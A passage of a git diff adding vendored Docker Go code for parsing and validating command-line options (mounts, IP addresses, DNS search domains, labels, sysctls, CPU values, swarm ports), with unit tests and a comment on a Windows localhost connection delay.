+		"type=bind,src=/source,dst=/target",
+		"type=bind,source=/source,dst=/target",
+		"type=bind,src=/source,target=/target",
+	} {
+		var mount MountOpt
+
+		assert.NilError(t, mount.Set(testcase))
+
+		mounts := mount.Value()
+		assert.Equal(t, len(mounts), 1)
+		assert.Equal(t, mounts[0], mounttypes.Mount{
+			Type:   mounttypes.TypeBind,
+			Source: "/source",
+			Target: "/target",
+		})
+	}
+}
+
+func TestMountOptSetVolumeNoError(t *testing.T) {
+	for _, testcase := range []string{
+		// tests several aliases that should have same result.
+		"type=volume,target=/target,source=/source",
+		"type=volume,src=/source,dst=/target",
+		"type=volume,source=/source,dst=/target",
+		"type=volume,src=/source,target=/target",
+	} {
+		var mount MountOpt
+
+		assert.NilError(t, mount.Set(testcase))
+
+		mounts := mount.Value()
+		assert.Equal(t, len(mounts), 1)
+		assert.Equal(t, mounts[0], mounttypes.Mount{
+			Type:   mounttypes.TypeVolume,
+			Source: "/source",
+			Target: "/target",
+		})
+	}
+}
+
+// TestMountOptDefaultType ensures that a mount without the type defaults to a
+// volume mount.
+func TestMountOptDefaultType(t *testing.T) {
+	var mount MountOpt
+	assert.NilError(t, mount.Set("target=/target,source=/foo"))
+	assert.Equal(t, mount.values[0].Type, mounttypes.TypeVolume)
+}
+
+func TestMountOptSetErrorNoTarget(t *testing.T) {
+	var mount MountOpt
+	assert.Error(t, mount.Set("type=volume,source=/foo"), "target is required")
+}
+
+func TestMountOptSetErrorInvalidKey(t *testing.T) {
+	var mount MountOpt
+	assert.Error(t, mount.Set("type=volume,bogus=foo"), "unexpected key 'bogus'")
+}
+
+func TestMountOptSetErrorInvalidField(t *testing.T) {
+	var mount MountOpt
+	assert.Error(t, mount.Set("type=volume,bogus"), "invalid field 'bogus'")
+}
+
+func TestMountOptSetErrorInvalidReadOnly(t *testing.T) {
+	var mount MountOpt
+	assert.Error(t, mount.Set("type=volume,readonly=no"), "invalid value for readonly: no")
+	assert.Error(t, mount.Set("type=volume,readonly=invalid"), "invalid value for readonly: invalid")
+}
+
+func TestMountOptDefaultEnableReadOnly(t *testing.T) {
+	var m MountOpt
+	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo"))
+	assert.Equal(t, m.values[0].ReadOnly, false)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly"))
+	assert.Equal(t, m.values[0].ReadOnly, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=1"))
+	assert.Equal(t, m.values[0].ReadOnly, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=true"))
+	assert.Equal(t, m.values[0].ReadOnly, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=bind,target=/foo,source=/foo,readonly=0"))
+	assert.Equal(t, m.values[0].ReadOnly, false)
+}
+
+func TestMountOptVolumeNoCopy(t *testing.T) {
+	var m MountOpt
+	assert.NilError(t, m.Set("type=volume,target=/foo,volume-nocopy"))
+	assert.Equal(t, m.values[0].Source, "")
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo"))
+	assert.Equal(t, m.values[0].VolumeOptions == nil, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=true"))
+	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
+	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy"))
+	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
+	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
+
+	m = MountOpt{}
+	assert.NilError(t, m.Set("type=volume,target=/foo,source=foo,volume-nocopy=1"))
+	assert.Equal(t, m.values[0].VolumeOptions != nil, true)
+	assert.Equal(t, m.values[0].VolumeOptions.NoCopy, true)
+}
+
+func TestMountOptTypeConflict(t *testing.T) {
+	var m MountOpt
+	assert.Error(t, m.Set("type=bind,target=/foo,source=/foo,volume-nocopy=true"), "cannot mix")
+	assert.Error(t, m.Set("type=volume,target=/foo,source=/foo,bind-propagation=rprivate"), "cannot mix")
+}
+
+func TestMountOptSetTmpfsNoError(t *testing.T) {
+	for _, testcase := range []string{
+		// tests several aliases that should have same result.
+		"type=tmpfs,target=/target,tmpfs-size=1m,tmpfs-mode=0700",
+		"type=tmpfs,target=/target,tmpfs-size=1MB,tmpfs-mode=700",
+	} {
+		var mount MountOpt
+
+		assert.NilError(t, mount.Set(testcase))
+
+		mounts := mount.Value()
+		assert.Equal(t, len(mounts), 1)
+		assert.DeepEqual(t, mounts[0], mounttypes.Mount{
+			Type:   mounttypes.TypeTmpfs,
+			Target: "/target",
+			TmpfsOptions: &mounttypes.TmpfsOptions{
+				SizeBytes: 1024 * 1024, // not 1000 * 1000
+				Mode:      os.FileMode(0700),
+			},
+		})
+	}
+}
+
+func TestMountOptSetTmpfsError(t *testing.T) {
+	var m MountOpt
+	assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-size=foo"), "invalid value for tmpfs-size")
+	assert.Error(t, m.Set("type=tmpfs,target=/foo,tmpfs-mode=foo"), "invalid value for tmpfs-mode")
+	assert.Error(t, m.Set("type=tmpfs"), "target is required")
+}
diff --git a/vendor/github.com/docker/docker/opts/opts.go b/vendor/github.com/docker/docker/opts/opts.go
new file mode 100644
index 0000000000..ae851537ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/opts.go
@@ -0,0 +1,360 @@
+package opts
+
+import (
+	"fmt"
+	"math/big"
+	"net"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/api/types/filters"
+)
+
+var (
+	alphaRegexp  = regexp.MustCompile(`[a-zA-Z]`)
+	domainRegexp = regexp.MustCompile(`^(:?(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9]))(:?\.(:?[a-zA-Z0-9]|(:?[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])))*)\.?\s*$`)
+)
+
+// ListOpts holds a list of values and a validation function.
+type ListOpts struct {
+	values    *[]string
+	validator ValidatorFctType
+}
+
+// NewListOpts creates a new ListOpts with the specified validator.
+func NewListOpts(validator ValidatorFctType) ListOpts {
+	var values []string
+	return *NewListOptsRef(&values, validator)
+}
+
+// NewListOptsRef creates a new ListOpts with the specified values and validator.
+func NewListOptsRef(values *[]string, validator ValidatorFctType) *ListOpts {
+	return &ListOpts{
+		values:    values,
+		validator: validator,
+	}
+}
+
+func (opts *ListOpts) String() string {
+	return fmt.Sprintf("%v", []string((*opts.values)))
+}
+
+// Set validates if needed the input value and adds it to the
+// internal slice.
+func (opts *ListOpts) Set(value string) error {
+	if opts.validator != nil {
+		v, err := opts.validator(value)
+		if err != nil {
+			return err
+		}
+		value = v
+	}
+	(*opts.values) = append((*opts.values), value)
+	return nil
+}
+
+// Delete removes the specified element from the slice.
+func (opts *ListOpts) Delete(key string) {
+	for i, k := range *opts.values {
+		if k == key {
+			(*opts.values) = append((*opts.values)[:i], (*opts.values)[i+1:]...)
+			return
+		}
+	}
+}
+
+// GetMap returns the content of values in a map in order to avoid
+// duplicates.
+func (opts *ListOpts) GetMap() map[string]struct{} {
+	ret := make(map[string]struct{})
+	for _, k := range *opts.values {
+		ret[k] = struct{}{}
+	}
+	return ret
+}
+
+// GetAll returns the values of slice.
+func (opts *ListOpts) GetAll() []string {
+	return (*opts.values)
+}
+
+// GetAllOrEmpty returns the values of the slice
+// or an empty slice when there are no values.
+func (opts *ListOpts) GetAllOrEmpty() []string {
+	v := *opts.values
+	if v == nil {
+		return make([]string, 0)
+	}
+	return v
+}
+
+// Get checks the existence of the specified key.
+func (opts *ListOpts) Get(key string) bool {
+	for _, k := range *opts.values {
+		if k == key {
+			return true
+		}
+	}
+	return false
+}
+
+// Len returns the amount of element in the slice.
+func (opts *ListOpts) Len() int {
+	return len((*opts.values))
+}
+
+// Type returns a string name for this Option type
+func (opts *ListOpts) Type() string {
+	return "list"
+}
+
+// NamedOption is an interface that list and map options
+// with names implement.
+type NamedOption interface {
+	Name() string
+}
+
+// NamedListOpts is a ListOpts with a configuration name.
+// This struct is useful to keep reference to the assigned
+// field name in the internal configuration struct.
+type NamedListOpts struct {
+	name string
+	ListOpts
+}
+
+var _ NamedOption = &NamedListOpts{}
+
+// NewNamedListOptsRef creates a reference to a new NamedListOpts struct.
+func NewNamedListOptsRef(name string, values *[]string, validator ValidatorFctType) *NamedListOpts {
+	return &NamedListOpts{
+		name:     name,
+		ListOpts: *NewListOptsRef(values, validator),
+	}
+}
+
+// Name returns the name of the NamedListOpts in the configuration.
+func (o *NamedListOpts) Name() string {
+	return o.name
+}
+
+// MapOpts holds a map of values and a validation function.
+type MapOpts struct {
+	values    map[string]string
+	validator ValidatorFctType
+}
+
+// Set validates if needed the input value and add it to the
+// internal map, by splitting on '='.
+func (opts *MapOpts) Set(value string) error {
+	if opts.validator != nil {
+		v, err := opts.validator(value)
+		if err != nil {
+			return err
+		}
+		value = v
+	}
+	vals := strings.SplitN(value, "=", 2)
+	if len(vals) == 1 {
+		(opts.values)[vals[0]] = ""
+	} else {
+		(opts.values)[vals[0]] = vals[1]
+	}
+	return nil
+}
+
+// GetAll returns the values of MapOpts as a map.
+func (opts *MapOpts) GetAll() map[string]string {
+	return opts.values
+}
+
+func (opts *MapOpts) String() string {
+	return fmt.Sprintf("%v", map[string]string((opts.values)))
+}
+
+// Type returns a string name for this Option type
+func (opts *MapOpts) Type() string {
+	return "map"
+}
+
+// NewMapOpts creates a new MapOpts with the specified map of values and a validator.
+func NewMapOpts(values map[string]string, validator ValidatorFctType) *MapOpts {
+	if values == nil {
+		values = make(map[string]string)
+	}
+	return &MapOpts{
+		values:    values,
+		validator: validator,
+	}
+}
+
+// NamedMapOpts is a MapOpts struct with a configuration name.
+// This struct is useful to keep reference to the assigned
+// field name in the internal configuration struct.
+type NamedMapOpts struct {
+	name string
+	MapOpts
+}
+
+var _ NamedOption = &NamedMapOpts{}
+
+// NewNamedMapOpts creates a reference to a new NamedMapOpts struct.
+func NewNamedMapOpts(name string, values map[string]string, validator ValidatorFctType) *NamedMapOpts {
+	return &NamedMapOpts{
+		name:    name,
+		MapOpts: *NewMapOpts(values, validator),
+	}
+}
+
+// Name returns the name of the NamedMapOpts in the configuration.
+func (o *NamedMapOpts) Name() string {
+	return o.name
+}
+
+// ValidatorFctType defines a validator function that returns a validated string and/or an error.
+type ValidatorFctType func(val string) (string, error)
+
+// ValidatorFctListType defines a validator function that returns a validated list of string and/or an error
+type ValidatorFctListType func(val string) ([]string, error)
+
+// ValidateIPAddress validates an Ip address.
+func ValidateIPAddress(val string) (string, error) {
+	var ip = net.ParseIP(strings.TrimSpace(val))
+	if ip != nil {
+		return ip.String(), nil
+	}
+	return "", fmt.Errorf("%s is not an ip address", val)
+}
+
+// ValidateDNSSearch validates domain for resolvconf search configuration.
+// A zero length domain is represented by a dot (.).
+func ValidateDNSSearch(val string) (string, error) {
+	if val = strings.Trim(val, " "); val == "." {
+		return val, nil
+	}
+	return validateDomain(val)
+}
+
+func validateDomain(val string) (string, error) {
+	if alphaRegexp.FindString(val) == "" {
+		return "", fmt.Errorf("%s is not a valid domain", val)
+	}
+	ns := domainRegexp.FindSubmatch([]byte(val))
+	if len(ns) > 0 && len(ns[1]) < 255 {
+		return string(ns[1]), nil
+	}
+	return "", fmt.Errorf("%s is not a valid domain", val)
+}
+
+// ValidateLabel validates that the specified string is a valid label, and returns it.
+// Labels are in the form on key=value.
+func ValidateLabel(val string) (string, error) {
+	if strings.Count(val, "=") < 1 {
+		return "", fmt.Errorf("bad attribute format: %s", val)
+	}
+	return val, nil
+}
+
+// ValidateSysctl validates a sysctl and returns it.
+func ValidateSysctl(val string) (string, error) {
+	validSysctlMap := map[string]bool{
+		"kernel.msgmax":          true,
+		"kernel.msgmnb":          true,
+		"kernel.msgmni":          true,
+		"kernel.sem":             true,
+		"kernel.shmall":          true,
+		"kernel.shmmax":          true,
+		"kernel.shmmni":          true,
+		"kernel.shm_rmid_forced": true,
+	}
+	validSysctlPrefixes := []string{
+		"net.",
+		"fs.mqueue.",
+	}
+	arr := strings.Split(val, "=")
+	if len(arr) < 2 {
+		return "", fmt.Errorf("sysctl '%s' is not whitelisted", val)
+	}
+	if validSysctlMap[arr[0]] {
+		return val, nil
+	}
+
+	for _, vp := range validSysctlPrefixes {
+		if strings.HasPrefix(arr[0], vp) {
+			return val, nil
+		}
+	}
+	return "", fmt.Errorf("sysctl '%s' is not whitelisted", val)
+}
+
+// FilterOpt is a flag type for validating filters
+type FilterOpt struct {
+	filter filters.Args
+}
+
+// NewFilterOpt returns a new FilterOpt
+func NewFilterOpt() FilterOpt {
+	return FilterOpt{filter: filters.NewArgs()}
+}
+
+func (o *FilterOpt) String() string {
+	repr, err := filters.ToParam(o.filter)
+	if err != nil {
+		return "invalid filters"
+	}
+	return repr
+}
+
+// Set sets the value of the opt by parsing the command line value
+func (o *FilterOpt) Set(value string) error {
+	var err error
+	o.filter, err = filters.ParseFlag(value, o.filter)
+	return err
+}
+
+// Type returns the option type
+func (o *FilterOpt) Type() string {
+	return "filter"
+}
+
+// Value returns the value of this option
+func (o *FilterOpt) Value() filters.Args {
+	return o.filter
+}
+
+// NanoCPUs is a type for fixed point fractional number.
+type NanoCPUs int64
+
+// String returns the string format of the number
+func (c *NanoCPUs) String() string {
+	return big.NewRat(c.Value(), 1e9).FloatString(3)
+}
+
+// Set sets the value of the NanoCPU by passing a string
+func (c *NanoCPUs) Set(value string) error {
+	cpus, err := ParseCPUs(value)
+	*c = NanoCPUs(cpus)
+	return err
+}
+
+// Type returns the type
+func (c *NanoCPUs) Type() string {
+	return "decimal"
+}
+
+// Value returns the value in int64
+func (c *NanoCPUs) Value() int64 {
+	return int64(*c)
+}
+
+// ParseCPUs takes a string ratio and returns an integer value of nano cpus
+func ParseCPUs(value string) (int64, error) {
+	cpu, ok := new(big.Rat).SetString(value)
+	if !ok {
+		return 0, fmt.Errorf("failed to parse %v as a rational number", value)
+	}
+	nano := cpu.Mul(cpu, big.NewRat(1e9, 1))
+	if !nano.IsInt() {
+		return 0, fmt.Errorf("value is too precise")
+	}
+	return nano.Num().Int64(), nil
+}
diff --git a/vendor/github.com/docker/docker/opts/opts_test.go b/vendor/github.com/docker/docker/opts/opts_test.go
new file mode 100644
index 0000000000..9f41e47864
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/opts_test.go
@@ -0,0 +1,232 @@
+package opts
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+)
+
+func TestValidateIPAddress(t *testing.T) {
+	if ret, err := ValidateIPAddress(`1.2.3.4`); err != nil || ret == "" {
+		t.Fatalf("ValidateIPAddress(`1.2.3.4`) got %s %s", ret, err)
+	}
+
+	if ret, err := ValidateIPAddress(`127.0.0.1`); err != nil || ret == "" {
+		t.Fatalf("ValidateIPAddress(`127.0.0.1`) got %s %s", ret, err)
+	}
+
+	if ret, err := ValidateIPAddress(`::1`); err != nil || ret == "" {
+		t.Fatalf("ValidateIPAddress(`::1`) got %s %s", ret, err)
+	}
+
+	if ret, err := ValidateIPAddress(`127`); err == nil || ret != "" {
+		t.Fatalf("ValidateIPAddress(`127`) got %s %s", ret, err)
+	}
+
+	if ret, err := ValidateIPAddress(`random invalid string`); err == nil || ret != "" {
+		t.Fatalf("ValidateIPAddress(`random invalid string`) got %s %s", ret, err)
+	}
+
+}
+
+func TestMapOpts(t *testing.T) {
+	tmpMap := make(map[string]string)
+	o := NewMapOpts(tmpMap, logOptsValidator)
+	o.Set("max-size=1")
+	if o.String() != "map[max-size:1]" {
+		t.Errorf("%s != [map[max-size:1]", o.String())
+	}
+
+	o.Set("max-file=2")
+	if len(tmpMap) != 2 {
+		t.Errorf("map length %d != 2", len(tmpMap))
+	}
+
+	if tmpMap["max-file"] != "2" {
+		t.Errorf("max-file = %s != 2", tmpMap["max-file"])
+	}
+
+	if tmpMap["max-size"] != "1" {
+		t.Errorf("max-size = %s != 1", tmpMap["max-size"])
+	}
+	if o.Set("dummy-val=3") == nil {
+		t.Errorf("validator is not being called")
+	}
+}
+
+func TestListOptsWithoutValidator(t *testing.T) {
+	o := NewListOpts(nil)
+	o.Set("foo")
+	if o.String() != "[foo]" {
+		t.Errorf("%s != [foo]", o.String())
+	}
+	o.Set("bar")
+	if o.Len() != 2 {
+		t.Errorf("%d != 2", o.Len())
+	}
+	o.Set("bar")
+	if o.Len() != 3 {
+		t.Errorf("%d != 3", o.Len())
+	}
+	if !o.Get("bar") {
+		t.Error("o.Get(\"bar\") == false")
+	}
+	if o.Get("baz") {
+		t.Error("o.Get(\"baz\") == true")
+	}
+	o.Delete("foo")
+	if o.String() != "[bar bar]" {
+		t.Errorf("%s != [bar bar]", o.String())
+	}
+	listOpts := o.GetAll()
+	if len(listOpts) != 2 || listOpts[0] != "bar" || listOpts[1] != "bar" {
+		t.Errorf("Expected [[bar bar]], got [%v]", listOpts)
+	}
+	mapListOpts := o.GetMap()
+	if len(mapListOpts) != 1 {
+		t.Errorf("Expected [map[bar:{}]], got [%v]", mapListOpts)
+	}
+
+}
+
+func TestListOptsWithValidator(t *testing.T) {
+	// Re-using logOptsvalidator (used by MapOpts)
+	o := NewListOpts(logOptsValidator)
+	o.Set("foo")
+	if o.String() != "[]" {
+		t.Errorf("%s != []", o.String())
+	}
+	o.Set("foo=bar")
+	if o.String() != "[]" {
+		t.Errorf("%s != []", o.String())
+	}
+	o.Set("max-file=2")
+	if o.Len() != 1 {
+		t.Errorf("%d != 1", o.Len())
+	}
+	if !o.Get("max-file=2") {
+		t.Error("o.Get(\"max-file=2\") == false")
+	}
+	if o.Get("baz") {
+		t.Error("o.Get(\"baz\") == true")
+	}
+	o.Delete("max-file=2")
+	if o.String() != "[]" {
+		t.Errorf("%s != []", o.String())
+	}
+}
+
+func TestValidateDNSSearch(t *testing.T) {
+	valid := []string{
+		`.`,
+		`a`,
+		`a.`,
+		`1.foo`,
+		`17.foo`,
+		`foo.bar`,
+		`foo.bar.baz`,
+		`foo.bar.`,
+		`foo.bar.baz`,
+		`foo1.bar2`,
+		`foo1.bar2.baz`,
+		`1foo.2bar.`,
+		`1foo.2bar.baz`,
+		`foo-1.bar-2`,
+		`foo-1.bar-2.baz`,
+		`foo-1.bar-2.`,
+		`foo-1.bar-2.baz`,
+		`1-foo.2-bar`,
+		`1-foo.2-bar.baz`,
+		`1-foo.2-bar.`,
+		`1-foo.2-bar.baz`,
+	}
+
+	invalid := []string{
+		``,
+		` `,
+		`  `,
+		`17`,
+		`17.`,
+		`.17`,
+		`17-.`,
+		`17-.foo`,
+		`.foo`,
+		`foo-.bar`,
+		`-foo.bar`,
+		`foo.bar-`,
+		`foo.bar-.baz`,
+		`foo.-bar`,
+		`foo.-bar.baz`,
+		`foo.bar.baz.this.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbethis.should.fail.on.long.name.beause.it.is.longer.thanisshouldbe`,
+	}
+
+	for _, domain := range valid {
+		if ret, err := ValidateDNSSearch(domain); err != nil || ret == "" {
+			t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err)
+		}
+	}
+
+	for _, domain := range invalid {
+		if ret, err := ValidateDNSSearch(domain); err == nil || ret != "" {
+			t.Fatalf("ValidateDNSSearch(`"+domain+"`) got %s %s", ret, err)
+		}
+	}
+}
+
+func TestValidateLabel(t *testing.T) {
+	if _, err := ValidateLabel("label"); err == nil || err.Error() != "bad attribute format: label" {
+		t.Fatalf("Expected an error [bad attribute format: label], go %v", err)
+	}
+	if actual, err := ValidateLabel("key1=value1"); err != nil || actual != "key1=value1" {
+		t.Fatalf("Expected [key1=value1], got [%v,%v]", actual, err)
+	}
+	// Validate it's working with more than one =
+	if actual, err := ValidateLabel("key1=value1=value2"); err != nil {
+		t.Fatalf("Expected [key1=value1=value2], got [%v,%v]", actual, err)
+	}
+	// Validate it's working with one more
+	if actual, err := ValidateLabel("key1=value1=value2=value3"); err != nil {
+		t.Fatalf("Expected [key1=value1=value2=value2], got [%v,%v]", actual, err)
+	}
+}
+
+func logOptsValidator(val string) (string, error) {
+	allowedKeys := map[string]string{"max-size": "1", "max-file": "2"}
+	vals := strings.Split(val, "=")
+	if allowedKeys[vals[0]] != "" {
+		return val, nil
+	}
+	return "", fmt.Errorf("invalid key %s", vals[0])
+}
+
+func TestNamedListOpts(t *testing.T) {
+	var v []string
+	o := NewNamedListOptsRef("foo-name", &v, nil)
+
+	o.Set("foo")
+	if o.String() != "[foo]" {
+		t.Errorf("%s != [foo]", o.String())
+	}
+	if o.Name() != "foo-name" {
+		t.Errorf("%s != foo-name", o.Name())
+	}
+	if len(v) != 1 {
+		t.Errorf("expected foo to be in the values, got %v", v)
+	}
+}
+
+func TestNamedMapOpts(t *testing.T) {
+	tmpMap := make(map[string]string)
+	o := NewNamedMapOpts("max-name", tmpMap, nil)
+
+	o.Set("max-size=1")
+	if o.String() != "map[max-size:1]" {
+		t.Errorf("%s != [map[max-size:1]", o.String())
+	}
+	if o.Name() != "max-name" {
+		t.Errorf("%s != max-name", o.Name())
+	}
+	if _, exist := tmpMap["max-size"]; !exist {
+		t.Errorf("expected map-size to be in the values, got %v", tmpMap)
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/opts_unix.go b/vendor/github.com/docker/docker/opts/opts_unix.go
new file mode 100644
index 0000000000..f1ce844a8f
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/opts_unix.go
@@ -0,0 +1,6 @@
+// +build !windows
+
+package opts
+
+// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080
+const DefaultHTTPHost = "localhost"
diff --git a/vendor/github.com/docker/docker/opts/opts_windows.go b/vendor/github.com/docker/docker/opts/opts_windows.go
new file mode 100644
index 0000000000..ebe40c969c
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/opts_windows.go
@@ -0,0 +1,56 @@
+package opts
+
+// TODO Windows. Identify bug in GOLang 1.5.1+ and/or Windows Server 2016 TP5.
+// @jhowardmsft, @swernli.
+//
+// On Windows, this mitigates a problem with the default options of running
+// a docker client against a local docker daemon on TP5.
+//
+// What was found that if the default host is "localhost", even if the client
+// (and daemon as this is local) is not physically on a network, and the DNS
+// cache is flushed (ipconfig /flushdns), then the client will pause for
+// exactly one second when connecting to the daemon for calls. For example
+// using docker run windowsservercore cmd, the CLI will send a create followed
+// by an attach. You see the delay between the attach finishing and the attach
+// being seen by the daemon.
+//
+// Here's some daemon debug logs with additional debug spew put in. The
+// AfterWriteJSON log is the very last thing the daemon does as part of the
+// create call. The POST /attach is the second CLI call. Notice the second
+// time gap.
+//
+// time="2015-11-06T13:38:37.259627400-08:00" level=debug msg="After createRootfs"
+// time="2015-11-06T13:38:37.263626300-08:00" level=debug msg="After setHostConfig"
+// time="2015-11-06T13:38:37.267631200-08:00" level=debug msg="before createContainerPl...."
+// time="2015-11-06T13:38:37.271629500-08:00" level=debug msg=ToDiskLocking....
+// time="2015-11-06T13:38:37.275643200-08:00" level=debug msg="loggin event...."
+// time="2015-11-06T13:38:37.277627600-08:00" level=debug msg="logged event...."
+// time="2015-11-06T13:38:37.279631800-08:00" level=debug msg="In defer func"
+// time="2015-11-06T13:38:37.282628100-08:00" level=debug msg="After daemon.create"
+// time="2015-11-06T13:38:37.286651700-08:00" level=debug msg="return 2"
+// time="2015-11-06T13:38:37.289629500-08:00" level=debug msg="Returned from daemon.ContainerCreate"
+// time="2015-11-06T13:38:37.311629100-08:00" level=debug msg="After WriteJSON"
+// ... 1 second gap here....
+// time="2015-11-06T13:38:38.317866200-08:00" level=debug msg="Calling POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach"
+// time="2015-11-06T13:38:38.326882500-08:00" level=info msg="POST /v1.22/containers/984758282b842f779e805664b2c95d563adc9a979c8a3973e68c807843ee4757/attach?stderr=1&stdin=1&stdout=1&stream=1"
+//
+// We suspect this is either a bug introduced in GOLang 1.5.1, or that a change
+// in GOLang 1.5.1 (from 1.4.3) is exposing a bug in Windows. In theory,
+// the Windows networking stack is supposed to resolve "localhost" internally,
+// without hitting DNS, or even reading the hosts file (which is why localhost
+// is commented out in the hosts file on Windows).
+//
+// We have validated that working around this using the actual IPv4 localhost
+// address does not cause the delay.
+//
+// This does not occur with the docker client built with 1.4.3 on the same
+// Windows build, regardless of whether the daemon is built using 1.5.1
+// or 1.4.3. It does not occur on Linux. We also verified we see the same thing
+// on a cross-compiled Windows binary (from Linux).
+//
+// Final note: This is a mitigation, not a 'real' fix. It is still susceptible
+// to the delay if a user were to do 'docker run -H=tcp://localhost:2375...'
+// explicitly.
+
+// DefaultHTTPHost Default HTTP Host used if only port is provided to -H flag e.g. docker daemon -H tcp://:8080
+const DefaultHTTPHost = "127.0.0.1"
diff --git a/vendor/github.com/docker/docker/opts/port.go b/vendor/github.com/docker/docker/opts/port.go
new file mode 100644
index 0000000000..020a5d1e1c
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/port.go
@@ -0,0 +1,146 @@
+package opts
+
+import (
+	"encoding/csv"
+	"fmt"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/go-connections/nat"
+)
+
+const (
+	portOptTargetPort    = "target"
+	portOptPublishedPort = "published"
+	portOptProtocol      = "protocol"
+	portOptMode          = "mode"
+)
+
+// PortOpt represents a port config in swarm mode.
+type PortOpt struct {
+	ports []swarm.PortConfig
+}
+
+// Set a new port value
+func (p *PortOpt) Set(value string) error {
+	longSyntax, err := regexp.MatchString(`\w+=\w+(,\w+=\w+)*`, value)
+	if err != nil {
+		return err
+	}
+	if longSyntax {
+		csvReader := csv.NewReader(strings.NewReader(value))
+		fields, err := csvReader.Read()
+		if err != nil {
+			return err
+		}
+
+		pConfig := swarm.PortConfig{}
+		for _, field := range fields {
+			parts := strings.SplitN(field, "=", 2)
+			if len(parts) != 2 {
+				return fmt.Errorf("invalid field %s", field)
+			}
+
+			key := strings.ToLower(parts[0])
+			value := strings.ToLower(parts[1])
+
+			switch key {
+			case portOptProtocol:
+				if value != string(swarm.PortConfigProtocolTCP) && value != string(swarm.PortConfigProtocolUDP) {
+					return fmt.Errorf("invalid protocol value %s", value)
+				}
+
+				pConfig.Protocol = swarm.PortConfigProtocol(value)
+			case portOptMode:
+				if value != string(swarm.PortConfigPublishModeIngress) && value != string(swarm.PortConfigPublishModeHost) {
+					return fmt.Errorf("invalid publish mode value %s", value)
+				}
+
+				pConfig.PublishMode = swarm.PortConfigPublishMode(value)
+			case portOptTargetPort:
+				tPort, err := strconv.ParseUint(value, 10, 16)
+				if err != nil {
+					return err
+				}
+
+				pConfig.TargetPort = uint32(tPort)
+			case portOptPublishedPort:
+				pPort, err := strconv.ParseUint(value, 10, 16)
+				if err != nil {
+					return err
+				}
+
+				pConfig.PublishedPort = uint32(pPort)
+			default:
+				return fmt.Errorf("invalid field key %s", key)
+			}
+		}
+
+		if pConfig.TargetPort == 0 {
+			return fmt.Errorf("missing mandatory field %q", portOptTargetPort)
+		}
+
+		if pConfig.PublishMode == "" {
+			pConfig.PublishMode = swarm.PortConfigPublishModeIngress
+		}
+
+		if pConfig.Protocol == "" {
+			pConfig.Protocol = swarm.PortConfigProtocolTCP
+		}
+
+		p.ports = append(p.ports, pConfig)
+	} else {
+		// short syntax
+		portConfigs := []swarm.PortConfig{}
+		// We can ignore errors because the format was already validated by ValidatePort
+		ports, portBindings, _ := nat.ParsePortSpecs([]string{value})
+
+		for port := range ports {
+			portConfigs = append(portConfigs, ConvertPortToPortConfig(port, portBindings)...)
+		}
+		p.ports = append(p.ports, portConfigs...)
+	}
+	return nil
+}
+
+// Type returns the type of this option
+func (p *PortOpt) Type() string {
+	return "port"
+}
+
+// String returns a string repr of this option
+func (p *PortOpt) String() string {
+	ports := []string{}
+	for _, port := range p.ports {
+		repr := fmt.Sprintf("%v:%v/%s/%s", port.PublishedPort, port.TargetPort, port.Protocol, port.PublishMode)
+		ports = append(ports, repr)
+	}
+	return strings.Join(ports, ", ")
+}
+
+// Value returns the ports
+func (p *PortOpt) Value() []swarm.PortConfig {
+	return p.ports
+}
+
+// ConvertPortToPortConfig converts ports to the swarm type
+func ConvertPortToPortConfig(
+	port nat.Port,
+	portBindings map[nat.Port][]nat.PortBinding,
+) []swarm.PortConfig {
+	ports := []swarm.PortConfig{}
+
+	for _, binding := range portBindings[port] {
+		hostPort, _ := strconv.ParseUint(binding.HostPort, 10, 16)
+		ports = append(ports, swarm.PortConfig{
+			//TODO Name: ?
+			Protocol:      swarm.PortConfigProtocol(strings.ToLower(port.Proto())),
+			TargetPort:    uint32(port.Int()),
+			PublishedPort: uint32(hostPort),
+			PublishMode:   swarm.PortConfigPublishModeIngress,
+		})
+	}
+	return ports
+}
diff --git a/vendor/github.com/docker/docker/opts/port_test.go b/vendor/github.com/docker/docker/opts/port_test.go
new file mode 100644
index 0000000000..67bcf8f1d9
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/port_test.go
@@ -0,0 +1,259 @@
+package opts
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestPortOptValidSimpleSyntax(t *testing.T) {
+	testCases := []struct {
+		value    string
+		expected []swarm.PortConfig
+	}{
+		{
+			value: "80",
+			expected: []swarm.PortConfig{
